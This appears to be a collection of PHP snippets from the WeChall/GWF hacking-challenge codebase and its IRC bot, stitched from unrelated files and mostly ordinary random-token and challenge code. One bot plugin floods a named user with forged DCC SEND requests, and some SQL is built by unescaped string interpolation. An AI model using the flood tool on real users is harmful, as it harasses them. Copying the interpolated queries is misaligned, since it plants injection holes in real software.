private static function generateToken()
{
do {
$token = GWF_Random::randomKey(self::TOKEN_LEN);
} while (false !== self::getByToken($token));
return $token;
}
public function onAddSite()
{
$form = $this->getForm();
if (false !== ($error = $form->validate($this->module))) {
return $error . $this->templateSiteAdd();
}
$site = new WC_Site(array('site_status' => 'wanted', 'site_name' => $form->getVar('site_name'), 'site_classname' => $form->getVar('site_classname'), 'site_country' => 0, 'site_language' => 0, 'site_joindate' => GWF_Time::getDate(GWF_Date::LEN_SECOND), 'site_launchdate' => '', 'site_authkey' => GWF_Random::randomKey(32), 'site_xauthkey' => GWF_Random::randomKey(32), 'site_irc' => '', 'site_url' => '', 'site_url_mail' => '', 'site_url_score' => '', 'site_url_profile' => '', 'site_score' => 0, 'site_basescore' => 0, 'site_avg' => 0, 'site_vote_dif' => 0, 'site_vote_fun' => 0, 'site_challcount' => 0, 'site_usercount' => 0, 'site_visit_in' => 0, 'site_visit_out' => 0, 'site_options' => 0, 'site_boardid' => 0, 'site_threadid' => 0, 'site_tags' => ''));
if (false === $site->insert()) {
return GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__));
}
Module_WeChall::includeVotes();
if (false === $site->onCreateVotes()) {
return GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__));
}
Module_WeChall::includeForums();
if (false === $site->onCreateBoard()) {
return GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__));
}
if (false === $site->onCreateThread($this->module)) {
return GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__));
}
require_once GWF_CORE_PATH . 'module/WeChall/WC_SiteDescr.php';
if (false === WC_SiteDescr::insertDescr($site->getID(), 1, 'Please edit me :)')) {
return GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__));
}
return $this->module->message('msg_site_added');
}
private static function randomWarToken()
{
$back = '';
for ($i = 0; $i < 6; $i++) {
$back .= '-' . GWF_Random::randomKey(5, '0123456789ABCDEF');
}
return substr($back, 1);
}
public static function generateToken()
{
$token = GWF_Random::randomKey(self::TOKEN_LENGTH);
$ua = new self(false);
if (false !== $ua->selectFirst('1', sprintf('token=\'%s\'', $ua->escape($token)))) {
return self::generateToken();
}
return $token;
}
private function onCrossRegister($username)
{
$options = 0;
$password = GWF_Random::randomKey();
$user = new GWF_User(array('user_id' => 0, 'user_options' => $options, 'user_name' => $username, 'user_password' => GWF_Password::hashPasswordS($password), 'user_regdate' => GWF_Time::getDate(GWF_Date::LEN_SECOND), 'user_regip' => GWF_IP6::getIP(GWF_IP_EXACT), 'user_email' => '', 'user_gender' => 'no_gender', 'user_lastlogin' => time(), 'user_lastactivity' => time(), 'user_birthdate' => '00000000', 'user_avatar_v' => 0, 'user_countryid' => 0, 'user_langid' => 1, 'user_langid2' => 0, 'user_level' => 0, 'user_title' => '', 'user_settings' => '', 'user_data' => '', 'user_credits' => '0.00'));
if (false === $user->insert()) {
return false;
}
return true;
}
/**
* @param $userid int
* @param $type string
* @param $data string
* @return string new token
*/
public static function createToken($userid, $type, $data = false)
{
$token = GWF_Random::randomKey(self::TOKEN_LENGTH);
$gdodata = array('userid' => $userid, 'type' => $type, 'token' => $token, 'timestamp' => time());
if (is_string($data)) {
$gdodata['data'] = $data;
}
$ac = new self($gdodata);
return false === $ac->replace() ? false : $token;
}
function crypto_dig1_map(array &$map, $c)
{
while (true) {
$m = GWF_Random::randomKey(2, 'abcdefghijklmnopqrstuvwxyz');
if (!in_array($m, $map)) {
$map[$c] = $m;
break;
}
}
return $map;
}
function prog2NextQuestion(WC_Challenge $chall)
{
if (false === ($user = GWF_Session::getUser())) {
die($chall->lang('err_login'));
}
$solution = GWF_Random::randomKey(rand(9, 12));
GWF_Session::set('prog2_solution', $solution);
GWF_Session::set('prog2_timeout', microtime(true));
// GWF_Session::commit();
die($solution);
}
/**
* Generate a new token in session.
* Returns tokenid. the session is an array of tokenid => userdata
* @param $userdata
* @return string
*/
public static function generateToken($userdata)
{
// if (self::DEBUG)
// {
// return "disabled";
// }
if (!GWF_Session::exists(self::TOKEN_NAME)) {
GWF_Session::set(self::TOKEN_NAME, array());
}
$a =& GWF_Session::get(self::TOKEN_NAME);
$token = GWF_Random::randomKey(self::TOKEN_ENTROPY);
$a[$token] = array(time(), $userdata);
self::cleanupOldTokens();
return $token;
}
function crackcha_next(WC_Challenge $chall)
{
if (crackcha_round_over()) {
header('Content-Type: text/plain');
if (false === crackcha_insert_high($chall)) {
echo GWF_HTML::lang('ERR_DATABASE', array(__FILE__, __LINE__));
return;
} else {
echo $chall->lang('msg_insert_high') . PHP_EOL;
echo crackcha_reset($chall);
return;
}
}
require_once GWF_CORE_PATH . 'inc/3p/Class_Captcha.php';
$chars = GWF_Random::randomKey(5, GWF_Random::ALPHAUP);
crackcha_increase_count();
GWF_Session::set('WCC_CRACKCHA_CHARS', $chars);
$aFonts = array(GWF_PATH . 'extra/font/teen.ttf');
$rgbcolor = GWF_CAPTCHA_COLOR_BG;
$oVisualCaptcha = new PhpCaptcha($aFonts, 210, 42, $rgbcolor);
$oVisualCaptcha->Create('', $chars);
}
function Upgrade_WeChall_1_01(Module_WeChall $module)
{
var_dump('TRIGGERED Upgrade_WeChall_1_01 (chall_token)');
$db = gdo_db();
$challs = GWF_TABLE_PREFIX . 'wc_chall';
$query = "ALTER TABLE {$challs} ADD COLUMN chall_token CHAR(8) CHARACTER SET ascii COLLATE ascii_bin NOT NULL DEFAULT ''";
if (false === $db->queryWrite($query)) {
return GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__));
}
$query = "SELECT chall_id FROM {$challs}";
if (false === ($result = $db->queryRead($query))) {
return GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__));
}
while (false !== ($row = $db->fetchRow($result))) {
$id = $row[0];
$token = GWF_Random::randomKey(8);
if (false === $db->queryWrite("UPDATE {$challs} SET chall_token='{$token}' WHERE chall_id={$id}")) {
return GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__));
}
}
$db->free($result);
return '';
}
/**
* Generate a download token.
* @return string
*/
public static function generateToken()
{
return GWF_Random::randomKey(self::TOKEN_LENGTH, GWF_Random::ALPHANUMUPLOW);
}
/**
* Strong Hashing function. using unique salt, dynamic salt and a rather strong algorithm.
* @param $string
* @return string salted SHA1 hash
*/
public static function hashPasswordS($password)
{
$salt = GWF_Random::randomKey(self::SALTLEN);
// Generate random salt.
return self::hashSHA1(self::SECRET_SALT . $password . $salt . self::SECRET_SALT) . $salt;
}
private static function genSolution()
{
$solution = GWF_Random::randomKey(32, GWF_Random::ALPHANUMUPLOW);
GWF_Session::set('LIV_SMI_SOL', $solution);
return $solution;
}
/**
* Reset counter and password.
* @return true|false
*/
function blightReset($consec = true)
{
if ($consec) {
# Reset consecutive success counter.
blightFailed();
}
# Take a timestamp.
GWF_Session::set('BLIGHT3_TIME_START', time());
# Generate a new hash.
$db = blightDB();
$sessid = GWF_Session::getSessSID();
$hash = GWF_Random::randomKey(32, 'ABCDEF0123456789');
$query = "REPLACE INTO blight VALUES({$sessid}, '{$hash}', 0)";
return $db->queryWrite($query);
}
/**
* Create a new options row.
* @param unknown_type $userid
* @return GWF_ForumOptions
*/
private static function createOptions($userid)
{
$row = new self(array('fopt_uid' => $userid, 'fopt_token' => GWF_Random::randomKey(GWF_Random::TOKEN_LEN), 'fopt_subscr' => self::SUBSCRIBE_NONE, 'fopt_signature' => '', 'fopt_options' => 0, 'fopt_thanks' => 0, 'fopt_upvotes' => 0, 'fopt_downvotes' => 0, 'fopt_posts' => 0));
if (false === $row->replace()) {
return false;
}
return $row;
}
function salesman_gen_problem(WC_Challenge $chall, array $list)
{
$level = salesman_getLevel();
$count = salesman_itemcount();
$stock = array();
$price = 0;
for ($i = 0; $i < $count; $i++) {
$keys = array_keys($list);
shuffle($keys);
$item = GWF_Random::arrayItem($keys);
if (isset($stock[$item])) {
$stock[$item]++;
} else {
$stock[$item] = 1;
}
$p = $list[$item];
$price += $p;
}
$back = '';
foreach ($list as $k => $v) {
$back .= sprintf('%s=%s', $k, $v) . PHP_EOL;
}
$stock = max($stock);
$back .= sprintf("%sItems=%d%sSum=%d%sStock=%d%sLevel=%d%s", PHP_EOL, $count, PHP_EOL, $price, PHP_EOL, $stock, PHP_EOL, $level, PHP_EOL);
GWF_Session::set('WCC_TR_CU_PRICE', $price);
GWF_Session::set('WCC_TR_CU_LEVEL_HAS_PB', true);
GWF_Session::set('WCC_TR_CU_TIME', microtime(true));
GWF_Session::set('WCC_TR_CU_STOCK', $stock);
return $back;
}
private static function getMibbitNickname()
{
if (false !== ($user = GWF_Session::getUser())) {
return $user->getVar('user_name');
}
return GWF_SITENAME . '_' . GWF_Random::randomKey(8, '0123456789');
}
public static function getRandomName(SR_Player $player)
{
static $rand = array('fairy_male' => array('Schwunkol'), 'fairy_female' => array('Ambra', 'Elina'), 'vampire_male' => array('Dracool', 'Vincent'), 'vampire_female' => array('Daria'), 'elve_male' => array('Filöen', 'Vincent'), 'elve_female' => array('Anja', 'Joanna'), 'darkelve_male' => array('Noplan'), 'darkelve_female' => array('Noplan'), 'woodelve_male' => array('Noplan'), 'woodelve_female' => array('Noplan'), 'halfelve_male' => array('Filöen', 'Alaster'), 'halfelve_female' => array('Anja'), 'human_male' => array('Lesley', 'Norman', 'Simon', 'Jessey', 'Tobias', 'Marcus', 'Oliver', 'Richard', 'Gandalf', 'Carsten', 'Mike', 'Paul', 'Wesley', 'Mathew', 'Jersey', 'Stephen'), 'human_female' => array('Mary', 'Tanny'), 'gnome_male' => array('Garry'), 'gnome_female' => array('Sabine'), 'dwarf_male' => array('Roon', 'Reiner', 'Oscar'), 'dwarf_female' => array('Alisa'), 'ork_male' => array('Grunt', 'Bruno'), 'ork_female' => array('Broga'), 'halfork_male' => array('Bren', 'Diego'), 'halfork_female' => array('Yuly'), 'halftroll_male' => array('Roon', 'Rodrigo'), 'halftroll_female' => array('Björk'), 'troll_male' => array('Roog'), 'troll_female' => array('Gunda'), 'gremlin_male' => array('gizmo'), 'gremlin_female' => array('gizma'));
$r = $rand[$player->getVar('sr4pl_race') . '_' . $player->getVar('sr4pl_gender')];
return GWF_Random::arrayItem($r);
}
<?php
$lang = array('en' => array('help' => 'Usage: %CMD% [rules]. Truth or dare 2.0.', 'rules' => 'Truth or Dare v2.0. Dice until a valid match is found. Truth == answer in channel, Dare == execute a shell command and paste results.', 'round' => '%s is asking you, %s: "Truth or dare!". See .tud rules for rules.'), 'de' => array('help' => 'Nutze: %CMD% [regeln]. Wahrheit oder Pflicht 2.0.', 'rules' => 'Wahrheit oder Pflicht v2.0. Würfel bis ein gültiges Pärchen gefunden wurde. Wahrheit == Im channel antworten. Pflicht == Einen Shell Befehl ausführen und Ergebnis pasten.', 'round' => '%s fragt dich, %s: "Wahrheit oder Pflicht!". Nutze .tud regeln um die Regeln einzusehen.'));
$plug = Dog::getPlugin();
$serv = Dog::getServer();
$chan = Dog::getChannel();
$argv = $plug->argv();
$argc = $plug->argc();
if ($argc > 1) {
return $plug->showHelp();
} elseif ($argc === 1) {
return $plug->rply('rules');
}
$players = array();
foreach ($chan->getUsers() as $u) {
$u instanceof Dog_User;
$players[] = $u;
}
$player = GWF_Random::arrayItem($players);
$player instanceof Dog_User;
$victim = GWF_Random::arrayItem($players);
$victim instanceof Dog_User;
$plug->rply('round', array($player->displayName(), $victim->displayName()));
public static function nextPrimeBetween($lo = self::LO_MAX, $hi = self::HI_MAX)
{
# Sanitize PHP Bullfrogs
$lo = preg_replace("[^0-9]", '', "{$lo}");
$hi = preg_replace("[^0-9]", '', "{$hi}");
if ($lo == $hi) {
return $lo;
} else {
if ($lo < $hi || $hi > $lo) {
# Swappish Sanity
$t = $lo;
$lo = $hi;
$hi = $t;
}
}
# Still unused :)
if ($lo < self::LO_MAX || $hi > self::HI_MAX) {
# Your prime is not in range!
return self::NO_NO_NOOOO;
}
# Check how cool you are
switch (GWF_Random::rand(0, 4)) {
case 0:
return self::NO_PRIME;
case 1:
return self::NO_CLUE;
# case 2: return self::NO_NEO;
# case 2: return self::NO_NEO;
case 3:
return self::NO_NO_NO;
case 4:
case 2:
# Good Enough :)
$the_value = '1';
while ($the_value < self::HI_MAX) {
$the_value = gmp_strval(gmp_nextprime(gmp_random(2)));
}
return $the_value;
}
}
private function onNewSign($email, $type, $langid)
{
$subscribe = new GWF_Newsletter(array('nl_email' => $email, 'nl_userid' => GWF_Session::getUserID(), 'nl_options' => $type, 'nl_unsign' => GWF_Random::randomKey(16), 'nl_langid' => $langid, 'nl_mailed_ids' => ':'));
if (false === $subscribe->replace()) {
return GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__));
}
return $this->module->message('msg_signed');
}
<?php
$lang = array('en' => array('help' => 'Usage: %CMD% <victim> [<amt=10>]. Try to send masses of DCC SEND file requests to annoy a particular user.', 'good' => 'Protected Clients: nettalk', 'bad' => 'Flawed Clients: kvirc'));
$plugin = Dog::getPlugin();
$argv = $plugin->argv();
$argc = count($argv);
if ($argc === 1) {
$amt = 10;
} elseif ($argc === 2) {
if (0 >= ($amt = (int) $argv[1])) {
return $plugin->showHelp();
}
} else {
return $plugin->showHelp();
}
$user = Dog::getUserByArg($argv[0]);
$server = Dog::getServer();
$one = chr(1);
$ip = ip2long('92.77.135.158');
for ($i = 0; $i < $amt; $i++) {
$filename = GWF_Random::randomKey(16) . '.txt';
$port = rand(10000, 50000);
$filesize = rand(20000, 80000);
$payload = "PRIVMSG {$user->getName()} :{$one}DCC SEND {$filename} {$ip} {$port} {$filesize}{$one}";
// $payload = "PRIVMSG {$user->getName()} :{$one}DCC CHAT $ip $port{$one}";
$server->sendRAW($payload);
}
require_once "challenge/html_head.php";
//html_head("Install Addslashes");
if (!GWF_User::isAdminS()) {
echo GWF_HTML::err('ERR_NO_PERMISSION');
return;
}
// $title = GWF_PAGE_TITLE;
$solution = $solution;
$score = 4;
$url = "challenge/training/php/experience/index.php";
$creators = "Gizmore";
$tags = 'MySQL,PHP,Exploit';
WC_Challenge::installChallenge(GWF_PAGE_TITLE, $solution, $score, $url, $creators, $tags);
if (!($db = gdo_db_instance(EXP_DB_HOST, EXP_DB_USER, EXP_DB_PASS, EXP_DB_NAME))) {
die(GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__)));
}
$db->truncateTable('items');
$db->truncateTable('flags');
foreach ($data as $title) {
$title = $db->escape($title);
$db->queryWrite("INSERT INTO items VALUES(0, '{$title}', NOW())");
}
$challenges = GDO::table('WC_Challenge')->selectObjects('*');
foreach ($challenges as $challenge) {
$challenge instanceof WC_Challenge;
$random_solution = GWF_Random::randomKey(32);
$db->queryWrite("INSERT INTO flags VALUES({$challenge->getID()}, '{$random_solution}')");
}
$challenge = WC_Challenge::getByTitle(GWF_PAGE_TITLE, false);
$db->queryWrite("REPLACE INTO flags VALUES({$challenge->getID()}, '{$solution}')");
require_once "challenge/html_foot.php";
<?php
$lang = array('en' => array('help' => 'Usage: %CMD%. Pick a random primenumber out of some.', 'out_no_prime' => 'Your input does not belong to a prime number.', 'out_no_clue' => 'The prime you have called is temporarily not available.', 'out_no_neo' => 'Prime Exit dialed. Please call again later!', 'out_no_error' => 'Your input does not belong to a prime number.', 'out_your_number' => "Your %s prime number is: %s.", 'out_no' => 'winnning', 'out_no_no' => 'lòósing'));
$plugin = Dog::getPlugin();
$primus = GWF_Prime::nextPrimeBetween();
switch ($primus) {
case GWF_Prime::NO_PRIME:
$massage = $plugin->lang('out_no_prime');
break;
case GWF_Prime::NO_CLUE:
$massage = $plugin->lang('out_no_clue');
break;
case GWF_Prime::NO_NEO:
$massage = $plugin->lang('out_no_neo');
break;
case GWF_Prime::NO_NO_NO:
$massage = $plugin->lang('out_no_error');
break;
case GWF_Prime::NO_NO_NOOOO:
$massage = $plugin->lang('out_your_number');
break;
default:
$yo = GWF_Random::rand(0, 1) ? 'out_no' : 'out_no_no';
$yo = $plugin->lang($yo);
$massage = $plugin->lang('out_your_number', array($yo, $primus));
}
$plugin->reply($massage);
/**
* Copy .example files and replace Variables
* Example files have to be in GWF_CORE_PATH/inc/install/data
* @param string $file the filename without extension
* @param string $path the destination path
* @param string $ext file extension (e.g. .php)
*/
public static function CopyExampleFile($file, $path, $ext = '.php', &$output)
{
$copied = $path . $file . $ext;
if (false === Common::isFile($copied)) {
if (false === GWF_File::isWriteable($copied)) {
$output .= GWF_InstallWizard::wizard_error('err_copy', array($copied));
return false;
}
# Load skeleton.
$example = GWF_CORE_PATH . 'inc/install/data/' . $file . '.example' . $ext;
if (false === ($content = file_get_contents($example))) {
$output .= GWF_HTML::err('ERR_FILE_NOT_FOUND', array($example));
return false;
}
# Replacements
$replace = array('%%GWFPATH%%' => GWF_DETECT_PATH, '%%DB%%' => escapeshellarg(GWF_DB_DATABASE), '%%USER%%' => escapeshellarg(GWF_DB_USER), '%%PASS%%' => escapeshellarg(GWF_DB_PASSWORD), '%%SALT%%' => escapeshellarg(GWF_Random::randomKey(16)));
$content = str_replace(array_keys($replace), array_values($replace), $content);
# Write custom file.
if (false === file_put_contents($copied, $content)) {
$output .= GWF_HTML::err('ERR_WRITE_FILE', array($copied));
return false;
}
if (false === chmod($copied, GWF_CHMOD)) {
$output .= GWF_InstallWizard::wizard_error('err_copy', array($example));
return false;
}
$output .= GWF_InstallWizard::wizard_message('msg_copy', array($copied));
} else {
$output .= GWF_InstallWizard::wizard_message('msg_copy_untouched', array($copied));
}
return true;
}
private static function createMCRow($userid, $demo)
{
$options = 0;
$options |= $demo === true ? self::DEMO : 0;
$row = new self(array('bmc_uid' => $userid, 'bmc_date' => NULL, 'bmc_token' => GWF_Random::randomKey(self::TOKEN_LEN, GWF_Random::ALPHANUMUPLOW), 'bmc_mc' => NULL, 'bmc_expires' => NULL, 'bmc_options' => $options));
if (false === $row->insert()) {
return false;
}
return $row;
}
/**
* Reset counter and password.
* @return true|false
*/
function blightReset()
{
$db = blightDB();
$sessid = GWF_Session::getSession()->getID();
$hash = GWF_Random::randomKey(32, 'ABCDEF0123456789');
$query = "REPLACE INTO blight VALUES({$sessid}, '{$hash}', 0)";
return $db->queryWrite($query);
}
$prot = $server->isSSL() ? 'ircs' : 'irc';
$port = $server->getPort();
} else {
$url = parse_url($argv[0]);
if (!isset($url['host'])) {
return $plugin->rply('err_url');
}
$host = $url['host'];
$prot = isset($url['scheme']) ? strtolower($url['scheme']) : 'irc';
if ($prot !== 'irc' && $prot !== 'ircs') {
return $plugin->rply('err_url');
}
$default_port = $prot === 'ircs' ? 6697 : 6667;
$port = isset($url['port']) ? intval($url['port']) : $default_port;
$options = Dog_Server::DEFAULT_OPTIONS;
$options |= $prot === 'ircs' ? Dog_Server::SSL : 0;
}
if (false !== ($server = Dog::getServerByArg($argv[0])) || false !== ($server = Dog::getServerByArg($host))) {
$plugin->reply('reconnecting');
$server->saveOption(Dog_Server::ACTIVE, true);
$server->saveOption(Dog_Server::SSL, $prot === 'ircs');
$server->saveVar('serv_port', $port);
} else {
$plugin->reply('adding_server');
$server = Dog_Server::getOrCreate($host, $port, $options);
$server->setVar('dog_connector', Dog::getUser());
$server->setConf('ircoppass', GWF_Random::randomKey(8));
Dog::addServer($server);
}
$server->setConnectIn(0.5);
$plugin->rply('connect');
<?php
$lang = array('en' => array('help' => 'Usage: %CMD% <integer>. Usage: %CMD% <integer>. Predict the next sequential integer polled from GWF_Random::rand(). Predict 20 in a row and i send you $100.', 'good' => 'Well done!', 'wrong' => 'You predicted %s but the outcome was %s.'));
$plugin = Dog::getPlugin();
$argv = $plugin->argv();
if (count($argv) !== 1 || !Common::isNumeric($argv[0])) {
return $plugin->showHelp();
}
$predicted = (int) $argv[0];
$rand = GWF_Random::rand();
if ($rand === $predicted) {
$plugin->rply('good');
} else {
$plugin->rply('wrong', array($predicted, $rand));
}
